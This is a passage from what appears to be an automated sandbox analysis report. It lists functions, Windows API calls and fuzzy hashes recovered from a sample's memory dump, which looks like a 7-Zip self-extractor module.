Instruction Fuzzy Hash: 8F317CB1A112089ECB11FFB2DD8AEEE7BA8AF44305F00403FA559A61E1EB784545CB59

Function 00401E6B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(a:@,00000000,-00000001,00403A61,?,00401A74,?,?,?,?,00401A74,?), ref: 00401E72
GetLastError.KERNEL32(?,?,?,?,00401A74,?), ref: 00401E7C
SetLastError.KERNEL32(000000B7,?,?,?,?,00401A74,?), ref: 00401E8C
GetFileAttributesW.KERNELBASE(?,?,?,?,?,00401A74,?), ref: 00401E9A

Strings

a:@, xrefs: 00401E6E

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ErrorLast$AttributesCreateDirectoryFile
String ID: a:@
API String ID: 635176117-3844204524
Opcode ID: 2870007de936e2cd6bf86a77b59755239ded30d6049a6d438da8b23bd184778b
Instruction ID: 62bb911204df67689409a0bf299a5fa733f048eefc6419992ca9e78119752425
Opcode Fuzzy Hash: 2870007de936e2cd6bf86a77b59755239ded30d6049a6d438da8b23bd184778b
Instruction Fuzzy Hash: 0CE09A3494A210BFEB212B24FC087DF3B549F01321F608A36FC19E21F0C3388852868A

Function 00416891 Relevance: 7.6, APIs: 5, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT(00000000,?,00000020,00010000), ref: 004168E8
memmove.MSVCRT(00000000,?,00000020,?,00010000), ref: 0041697F
??3@YAXPAX@Z.MSVCRT(00000000), ref: 0041698B

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??3@memcpymemmove
String ID:
API String ID: 3549172513-0
Opcode ID: 85b00a1da2e75e8d58eb8ba0f360279bf7837f3aab605fd12771fdc2f3034734
Instruction ID: 6694c7cce515cef0b0cd55d5e6bb9cb7435d9f647c4cb47c4d4af15ebe31c866
Opcode Fuzzy Hash: 85b00a1da2e75e8d58eb8ba0f360279bf7837f3aab605fd12771fdc2f3034734
Instruction Fuzzy Hash: 2D41CEB1A10204ABDB20DE65C941BFFB7B9EF44704F16446EE845A7241D738EE81CBA9

Function 0040B2B0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(?,?,?,?,004168E1,00010000), ref: 0040B2C3
memmove.MSVCRT(00000000,?,?), ref: 0040B2E0
??3@YAXPAX@Z.MSVCRT(?,?,?,?,004168E1,00010000), ref: 0040B2F1

Strings

hA, xrefs: 0040B2B2

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??2@??3@memmove
String ID: hA
API String ID: 3828600508-1221461045
Opcode ID: bc9196dac32aa623d13a183dec5295da8b1281fe9b3a0aa3bad5d2b53f65af72
Instruction ID: d87302abea443053d5760b5c6252bf4bae7be4f47644660215ecec497c7fda62
Opcode Fuzzy Hash: bc9196dac32aa623d13a183dec5295da8b1281fe9b3a0aa3bad5d2b53f65af72
Instruction Fuzzy Hash: BEF0B4B66006005BC2209B1B9C9485BB7E9EFC9700704887FE92ED3700D334FC54C6AE

Function 00402EE4 Relevance: 6.4, APIs: 5, Instructions: 118
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(?,?,00404004,0041EA30,?,?,0040618A,00000000,00000000,?,?,?,00000000,?), ref: 00402F16
lstrlenA.KERNEL32(?,?,00404004,0041EA30,?,?,0040618A,00000000,00000000,?,?,?,00000000,?), ref: 00402F1E
memcmp.MSVCRT(00000000,?,?), ref: 00402F84
memcmp.MSVCRT(00000000,?,?,?,00404004,0041EA30,?,?,0040618A,00000000,00000000,?,?,?,00000000,?), ref: 00402FC1
memmove.MSVCRT(?,?,00000000,?,00404004,0041EA30,?,?,0040618A,00000000,00000000,?,?,?,00000000,?), ref: 00402FF3

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: lstrlenmemcmp$memmove
String ID:
API String ID: 3251180759-0
Opcode ID: 6bc55519efb0b0d7bcd01b07c395372ad45836126fbb7a8d58e6edc0d1d2ad79
Instruction ID: 79ec95c0005fca4e8b411a1d1c8c43267f3aca6e0e8108953f5cc2358a2b563c
Opcode Fuzzy Hash: 6bc55519efb0b0d7bcd01b07c395372ad45836126fbb7a8d58e6edc0d1d2ad79
Instruction Fuzzy Hash: 9B417072D0120AAFCF01DFA4C9849EEBFB9EF48384F0444AAE805B3245D3759E85DB55

Function 004019D2 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(000001E8,00000000,0041E9E8,ExecuteFile,00000026,00000026,?,00406D79,?,0041E9E8,0041E9E8), ref: 004019DF
??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00401A23
??2@YAPAXI@Z.MSVCRT(00000044), ref: 00401A7B

Part of subcall function 00409606: wvsprintfW.USER32(?,00000000,?), ref: 0040962A
Part of subcall function 00409606: GetLastError.KERNEL32 ref: 0040963B
Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,004072DC), ref: 00409663
Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,004072DC), ref: 00409678
Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 0040968B
Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 00409692
Part of subcall function 00409606: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004096A7
Part of subcall function 00409606: lstrcpyW.KERNEL32(00000000,?), ref: 004096BD
Part of subcall function 00409606: lstrcpyW.KERNEL32(-00000002,?), ref: 004096CE
Part of subcall function 00409606: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 004096D7
Part of subcall function 00409606: LocalFree.KERNEL32(?), ref: 004096E1

Strings

ExecuteFile, xrefs: 004019D7

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??2@$FormatMessagelstrcpylstrlen$??3@ErrorFreeLastLocalwvsprintf
String ID: ExecuteFile
API String ID: 1592922708-323923146
Opcode ID: 9ac5554e1c21d9026da9657adf3441f6da01eba3c8fc77f1622ea7b0805a4649
Instruction ID: c177ff4ec49e1bf3251047196a645ec591425be599670d09217b52daf662347d
Opcode Fuzzy Hash: 9ac5554e1c21d9026da9657adf3441f6da01eba3c8fc77f1622ea7b0805a4649
Instruction Fuzzy Hash: 3D31A075701204BFCB10DBA6CC85DAF77A9EF85314724486FF405EB2A1DA789D80CB69

Function 00401880 Relevance: 6.1, APIs: 4, Instructions: 100
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,0040133C,00000000,00000000,?), ref: 004018C4
WaitForSingleObject.KERNEL32(000000FF,?,00401AE1,?,?), ref: 004018E5

Part of subcall function 00409606: wvsprintfW.USER32(?,00000000,?), ref: 0040962A
Part of subcall function 00409606: GetLastError.KERNEL32 ref: 0040963B
Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,004072DC), ref: 00409663
Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,004072DC), ref: 00409678
Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 0040968B
Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 00409692
Part of subcall function 00409606: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004096A7
Part of subcall function 00409606: lstrcpyW.KERNEL32(00000000,?), ref: 004096BD
Part of subcall function 00409606: lstrcpyW.KERNEL32(-00000002,?), ref: 004096CE
Part of subcall function 00409606: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 004096D7
Part of subcall function 00409606: LocalFree.KERNEL32(?), ref: 004096E1

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
String ID:
API String ID: 359084233-0
Opcode ID: 319690abfe6fd779aaf84523b8fe0746c993e0633f498ebd4a0fa4e94ee787c6
Instruction ID: 75a92c2673557d9aa231ca5611e15780e437056db76e39d6c0de200791827833
Opcode Fuzzy Hash: 319690abfe6fd779aaf84523b8fe0746c993e0633f498ebd4a0fa4e94ee787c6
Instruction Fuzzy Hash: 143124F5640200BAEB315B16DC55ABB3769EB84350F24813BF905FA2F0C6788981D72E

Function 00414DCF Relevance: 4.9, APIs: 3, Instructions: 410
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00414DD8
??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 00414F76
??2@YAPAXI@Z.MSVCRT(00000038,00000000,00000001), ref: 00415049

Part of subcall function 00415346: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,0041505A,00000000,00000001), ref: 0041536E

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??2@$H_prolog
String ID:
API String ID: 3431946709-0
Opcode ID: 04c58f70b3ae3af4a81f86ac04d094f81de620dd4ea7d6dbb38bc93096a2a0a8
Instruction ID: 05c66da844a657c6192dd0360cb768692f443836589bcaaccfb39479f9247554
Opcode Fuzzy Hash: 04c58f70b3ae3af4a81f86ac04d094f81de620dd4ea7d6dbb38bc93096a2a0a8
Instruction Fuzzy Hash: 5AF12871600609DFCB14DF69C884AEE7BB4BF88314F14415AF8199B351DB39ED82CB98

Function 00403F89 Relevance: 4.7, APIs: 3, Instructions: 151COMMON

Download Yara Rule

APIs

Part of subcall function 00402665: LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,0040269B,00405D06,7zSfxVarModulePlatform,x86), ref: 00402675
Part of subcall function 00402665: GetProcAddress.KERNEL32(00000000), ref: 0040267C
Part of subcall function 00402665: GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,0040269B,00405D06,7zSfxVarModulePlatform,x86), ref: 0040268A

??3@YAXPAX@Z.MSVCRT(0040618A,?,?,?,?,?,?,?,0040618A), ref: 00404117
??3@YAXPAX@Z.MSVCRT(?,0040618A,?,?,?,?,?,?,?,0040618A), ref: 0040411F
??3@YAXPAX@Z.MSVCRT(?,?,0040618A,?,?,?,?,?,?,?,0040618A), ref: 00404127

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??3@$AddressInfoLibraryLoadNativeProcSystem
String ID:
API String ID: 1642057587-0
Opcode ID: 8baa72d996272d38ed05c446b7b0ed8a988b778acb04223dc58cbd51a4d46b7c
Instruction ID: 9e508ec73b50e54c44e6a1cbebbe2d332481b03b5bec8f58460c8bd0d041dc66
Opcode Fuzzy Hash: 8baa72d996272d38ed05c446b7b0ed8a988b778acb04223dc58cbd51a4d46b7c
Instruction Fuzzy Hash: 9B515AB2D00109AACF01EFD1CD859FEBB7AAF48308F04442AF611B21D1D7799A4ADB59

Function 00415EEA Relevance: 4.6, APIs: 3, Instructions: 114COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00415EEF

Part of subcall function 00418390: _EH_prolog.MSVCRT ref: 00418395

??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00415F9F
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00415FDE

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??3@H_prolog
String ID:
API String ID: 1329742358-0
Opcode ID: 489a3c7cee778f4efcc6a7dc722babe966adbbc4dc412f5c71f799eb8d0ccc08
Instruction ID: ee2028b182a3def668edec6c1c55fa530388cf6d31d76bb4d9d5585ab1c54ad5
Opcode Fuzzy Hash: 489a3c7cee778f4efcc6a7dc722babe966adbbc4dc412f5c71f799eb8d0ccc08
Instruction Fuzzy Hash: 3C414E3160020ADFCB11DFA5C895AEEBBB8EF84304F14446EF406A7251DB79AD86CB15

Function 004029C5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 004029E9

Strings

@, xrefs: 004029DC

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID: @
API String ID: 1890195054-2766056989
Opcode ID: 59fdda50a6964837229ca20d0fc0b21477a5b75227e6593dad09989c17fceb1e
Instruction ID: ac6f2177cda35d3747c738f0166e8eeafa9c669c636109ee84ed785ee5894a61
Opcode Fuzzy Hash: 59fdda50a6964837229ca20d0fc0b21477a5b75227e6593dad09989c17fceb1e
Instruction Fuzzy Hash: 05F0C8B1B242049ADF71A775DA4DB9E77E4BB04358F10453BD402F61C1EBB8D8448A0D

Function 004180FF Relevance: 3.2, APIs: 2, Instructions: 204COMMON

Download Yara Rule

APIs

Part of subcall function 00416224: _CxxThrowException.MSVCRT(?,0041C8F8), ref: 0041623E

??3@YAXPAX@Z.MSVCRT(?,?,?,?,0041C40C,?,?,?,0041BE90), ref: 0041821D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0041C40C,?,?,?,0041BE90), ref: 00418381

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??3@$ExceptionThrow
String ID:
API String ID: 2803161813-0
Opcode ID: e10bf944ff68911ba707479cc8ffbf2420e48e5b65e3bf21be0fe4843cdedc08
Instruction ID: 83b4708bc2a3ecc906b18b476579f0d6f6f5e7f9de80452c7b562753e21decce
Opcode Fuzzy Hash: e10bf944ff68911ba707479cc8ffbf2420e48e5b65e3bf21be0fe4843cdedc08
Instruction Fuzzy Hash: 50815831A00609AFCB24DFA5C891AEEBBF1FF08314F14456EE955A3351DB39A981CB58

Function 004011B7 Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011D7
??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011FD

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: 68d18e978562b686aa57d02b5185ded876e64a512ac0e82d18ed9b6a0d6aac65
Instruction ID: 4976e3025a107b63499e13e7bd885c103cda5e9e62e117b5f23361b6eed5d2a5
Opcode Fuzzy Hash: 68d18e978562b686aa57d02b5185ded876e64a512ac0e82d18ed9b6a0d6aac65
Instruction Fuzzy Hash: 65F08C36210611ABC324DF6DC59186BB3E4FB88351720883FE6DBD72A1DA35A8918754

Function 00402805 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00402B46,00000001,?,00403119,00000000,00000000,00000000), ref: 00402815
??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00402B46,00000001,?,00403119,00000000,00000000,00000000), ref: 00402839

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: 2064f16d128cdefb72a915ff298af5a2bfcd9ac95c91b2f18fb6f0bffc5949de
Instruction ID: bcdea4c81718d913e52e4f2a3d02f3e10d2d0235028ef0e1c46e76d630642e7e
Opcode Fuzzy Hash: 2064f16d128cdefb72a915ff298af5a2bfcd9ac95c91b2f18fb6f0bffc5949de
Instruction Fuzzy Hash: 9AF0903A0046419FC330AF2AC594843FBE8EB59714720CD7FE1D6D36A2C674A880C764

Function 00412305 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,?), ref: 00412320
GetLastError.KERNEL32(?,?,?,?), ref: 0041232E

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 7ccaebcf3ae4d329a8be65b6a742600eba4963c05187a2ee435572f36bdccfb6
Instruction ID: 65ff4e97a72b45656fb33b06e3671964329e584f013e41466ec28955d6667f50
Opcode Fuzzy Hash: 7ccaebcf3ae4d329a8be65b6a742600eba4963c05187a2ee435572f36bdccfb6
Instruction Fuzzy Hash: B7F0B7B4900208EF8B05CFA4D9448EE7BB5EB49310B208599F815D7350D7759A60DB65

Function 004134C7 Relevance: 2.5, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 004134D2
LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 004134F1

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: a42822acf305faa6e4e1ed1b7c307282cd490a9ff452566294a691c589accf54
Instruction ID: b96cbccc89c31bbccc7d9b04d0ab1e0d7f4ede81ffdd75c3392c9c36ee2ff524
Opcode Fuzzy Hash: a42822acf305faa6e4e1ed1b7c307282cd490a9ff452566294a691c589accf54
Instruction Fuzzy Hash: 43F0B432200204ABCB218F95CC08ECABBB9EF49761F14441AFA05E7220C775E860DBA4

Function 004143A1 Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 004143D6

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: a5f2d7237813c990e40069af46c32fbbc70be7282d3e3fe7c7570c906ef1087d
Instruction ID: cd62177f8338b91460b71a425ed9147b2bdb3dfef56ead52da7ce74447b44359
Opcode Fuzzy Hash: a5f2d7237813c990e40069af46c32fbbc70be7282d3e3fe7c7570c906ef1087d
Instruction Fuzzy Hash: FEF0903260010CBB9B11AF55C8418FFB76DEF91764704802FFC189B301D679EE8187A4

Function 004012AB Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,?), ref: 004012EF

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e60c0da1a95ea1348e4e355d4ccb5392af3e0846045a7b71aebea512eebea2b4
Instruction ID: a535b6e06518e329df30477031f310d0f2202fa2471075cd59bb490024d4aebd
Opcode Fuzzy Hash: e60c0da1a95ea1348e4e355d4ccb5392af3e0846045a7b71aebea512eebea2b4
Instruction Fuzzy Hash: EDF05E321006029BC7209F55C804BA773F5BB88310F04482EE046F25A0D738A891DF59

Function 0041236B Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041229A: CloseHandle.KERNELBASE(?,?,00412376,00000000,?,004123BE,?,80000000,?,?,?,004123E0,?,?,00000003,00000080), ref: 004122A5

CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00000000,?,004123BE,?,80000000,?,?,?,004123E0), ref: 0041238D

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
